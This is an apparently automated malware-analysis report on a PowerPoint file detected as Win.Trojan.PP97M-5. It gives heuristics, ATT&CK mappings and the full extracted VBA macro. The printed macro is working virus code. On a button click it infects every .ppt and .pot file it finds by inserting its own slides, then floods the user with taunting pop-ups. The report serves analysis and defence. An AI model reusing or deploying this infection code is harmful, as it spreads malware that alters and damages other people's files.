MALICIOUS
140
Risk Score
Malware Insights
MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1059.005 Visual Basic
The file is identified as malicious by ClamAV with the signature Win.Trojan.PP97M-5. It contains VBA macros that, when executed via the 'milenium' button click, attempt to inject the current presentation's slides into other PowerPoint files found in the active presentation's directory and the application's startup path. The script also displays several aggressive pop-up messages to the user.
Heuristics 2
-
ClamAV: Win.Trojan.PP97M-5 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.PP97M-5
-
VBA macros detected medium OLE_VBA_MACROSDocument contains VBA macro code
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1864 bytes |
SHA-256: 411742f6b1255ab1dfbf52207af91014ae0f65c491ac42c61d59adc591f4a80f |
|||
|
Detection
ClamAV:
Win.Trojan.PP97M-5
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Slide1"
Attribute VB_Base = "0{91493445-5A91-11CF-8700-00AA0060263B}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "milenium, 1, 0, MSForms, CommandButton"
Private Sub milenium_Click()
Application.ScreenUpdating = False
hpath = ActivePresentation.FullName
With Application.FileSearch
.NewSearch
.LookIn = ActivePresentation.Path
.SearchSubFolders = True
.FileName = "*.ppt"
End With
For cq = 1 To Application.FileSearch.FoundFiles.Count
Set futureh = Presentations.Open(Application.FileSearch.FoundFiles(cq))
If futureh.Slides(1).Name <> "DarkPoison" Then
futureh.Slides.InsertFromFile hpath, 1, 1, -1
futureh.Save
End If
futureh.Close
Next cq
With Application.FileSearch
.NewSearch
.LookIn = Application.StartupPath
.SearchSubFolders = True
.FileName = "*.pot"
End With
For cq = 1 To Application.FileSearch.FoundFiles.Count
Set futureh = Presentations.Open(Application.FileSearch.FoundFiles(cq))
If futureh.Slides(1).Name <> "DarkPoison" Then
futureh.Slides.InsertFromFile hpath, 1, 1, -1
futureh.Save
End If
futureh.Close
Next cq
Application.ScreenUpdating = False
If Minute(Now) = Int(60 * Rnd) Then
MsgBox "Every time that AntiVirus companies detects a virus," & vbCr & "we(the VX xcene) come up with a new infection tech.", vbCritical, "Yozak in the new MILENIUM"
MsgBox "Our scene is too active for you!" & vbCr & "So lamers get the hell out of here" & vbCr & "You make me sick", vbOKOnly, "Yozak in the new MILENIUM"
For v = 1 To Int(5000 * Rnd)
Beep
MsgBox "Lamers BEWARE !!", vbApplicationModal, "Yozak in the new melium"
Next v
MsgBox "YOZAC enters the new milenium with a DARKPOISoN!!!!", vbMsgBoxSetForeground, "DARKPOISoN"
End If
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.